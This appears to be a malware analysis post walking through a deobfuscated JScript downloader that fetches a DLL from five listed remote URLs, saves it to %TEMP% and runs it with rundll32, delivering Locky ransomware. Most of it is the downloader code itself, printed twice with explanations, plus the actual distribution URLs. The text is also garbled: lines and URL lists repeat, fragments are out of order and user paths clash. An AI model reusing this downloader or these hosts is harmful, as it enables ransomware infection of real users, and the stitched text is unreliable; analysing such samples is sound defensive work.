var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);
var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;
// rundll32.exe <short path>,woody
GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
some parts :
// Same three-line excerpt as shown at the top of the post: values in the clear, only the names obfuscated.
// "437" is never read anywhere in the full listing - presumably padding.
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
// WScript.Shell, used for environment expansion and later to launch rundll32.exe.
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
// %TEMP% is the directory where the downloaded DLL is dropped.
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
2-2) A quick look at the code gives us a lot of info :
- all variables have very long names to "obfuscate"
- all important values are in the clear (for building objects, calling functions...)
- formatting is very chaotic.
- all important values are in the clear (for building objects, calling functions...)
- formatting is very chaotic.
2-3) Replacement of variable names :
// Renamed (deobfuscated) version as posted. The extraction dropped several lines of this copy:
// the contents and closing bracket of tab_URLs and tab_Method_HTTP, the path / architecture
// variables, the header of the loop over tab_Method_HTTP and the stream "open" call, so this
// fragment does not parse as-is. A more complete copy with line-by-line notes follows further
// down the page; the original obfuscated listing above is the authoritative one.
tab_URLs = [
file = "r3wZioifc";
// SaveToFile option 2 = adSaveCreateOverWrite.
var para_save_file = 2;
var shell = WScript["CreateObject"]("WScript.Shell");
// tab_of_system_strings is not declared in this fragment (shell.Environment("System") in the full copy).
if (tab_of_system_strings ("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var tab_Method_HTTP = [
{
try
{
// First HTTP ProgID that instantiates is kept.
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);
{
continue;
};
var obj_FSO = new ActiveXObject("Scripting.FileSystemObject");
// Per URL: synchronous GET, poll to completion, save the body as the .dll, run it, quit.
for (var index = 0; index < tab_URLs.length; index = index + 1)
{
try
{
obj_http["open"]("GET", tab_URLs[index], false);
obj_http["send"]();
while (obj_http.readystate < 4)
WScript["Sleep"](100);
var obj_stream = WScript["CreateObject"]("ADODB.Stream");
obj_stream["type"] = type;
obj_stream["write"](obj_http["ResponseBody"]);
obj_stream["position"] = 0;
obj_stream["SaveToFile"](path_file_dll, para_save_file);
obj_stream["close"]();
var obj_File = obj_FSO.GetFile(path_file_dll);
// The rundll32 "Run" line is missing from this copy; see the annotated copy below.
WScript.Quit(0);
} catch (e) {
// Any failure falls through to the next URL.
continue;
};
}
WScript.Quit(0);
3) Conclusion :
"http: //henanbusiness.net/xzwl8m2b",
"http: //himichesko-varna.com/fzqrolxe",
"http: //fototour.pl/hv9wgx80",
"http: //choopchirk.net/349u8",
"http: //rokematin.com/3ekauq6y"
];
"http: //himichesko-varna.com/fzqrolxe",
"http: //fototour.pl/hv9wgx80",
"http: //choopchirk.net/349u8",
"http: //rokematin.com/3ekauq6y"
file = "r3wZioifc";
=> Name
var type = 1;
var para_save_file = 2;
var shell = WScript["CreateObject"]("WScript.Shell");
=> object Shell created
var path = shell.ExpandEnvironmentStrings("%TEMP%/");
=> %TEMP%/ => C:\Users\DardiM\AppData\Local\Temp
var path_file = path + file;
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc
var path_file_dll = path_file + ".d" + "ll";
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var tab_of_system_strings = shell.Environment("System");
if (tab_of_system_strings ("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
=> Which processor architecture is used ?
var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else {
=> 64 bit : C:\Windows\SysWOW64\rundll32.exe (the 32-bit copy of rundll32 on a 64-bit Windows)
var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
=> 32 bit : C:\Windows\System32\rundll32.exe
var tab_Method_HTTP = [
"MSXML2.XMLHTTP",
"WinHttp.WinHttpRequest.5.1"
];"WinHttp.WinHttpRequest.5.1"
=> methods (COM objects) that can be used for the HTTP connection
for (var index = 0; index < tab_Method_HTTP["length"]; index++)
{
try
{
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);
=> creates an Http object from the table that contains the two methods
break;
=> if one method works : exit the for loop
} catch (e)
=> if one method works : exit the for loop
{
continue;
=> continue until one method works
}
};
var obj_FSO = new ActiveXObject("Scripting.FileSystemObject");
for (var index = 0; index < tab_URLs.length; index = index + 1)
{
try
{
obj_http["open"]("GET", tab_URLs[index], false);
obj_http["send"]();
while (obj_http.readystate < 4)
WScript["Sleep"](100);
var obj_stream = WScript["CreateObject"]("ADODB.Stream");
=> object stream created to retrieve the response of the request
obj_stream["open"]();
obj_stream["type"] = type;
obj_stream["write"](obj_http["ResponseBody"]);
=> response data written on the stream
obj_stream["SaveToFile"](path_file_dll, para_save_file);
=> File saved ; para_save_file = 2 : overwrite if it already exists
var obj_File = obj_FSO.GetFile(path_file_dll);
=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var small_file_path = obj_File.ShortPath;
=> get the short file name : C:\Users\DardiM\AppData\Local\Temp\R3WZIO~1.DLL
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
A very easy to understand script, the only obfuscation being very long variable names made of random letters.
From :
http ://henanbusiness.net/xzwl8m2b,
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y
The first URL that works is used to download a file :
- r3wZioifc.dll
on the folder :
- C:\Users\DardiM\AppData\Local\Temp\
Run part :
Using the rundll32 determined for our OS version :
=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"
=> entry point of the dll (the exported function rundll32 calls) : woody => necessary for it to work
Payload : Locky .thor
=> C:\Windows\SysWOW64\rundll32.exe
=> C:\Windows\System32\rundll32.exe
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");
=> C:\Windows\System32\rundll32.exe
=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"
=> entry point of the dll (the exported function rundll32 calls) : woody => necessary for it to work
Very easy method used....
A very good example to start teaching malware scripts to your children ...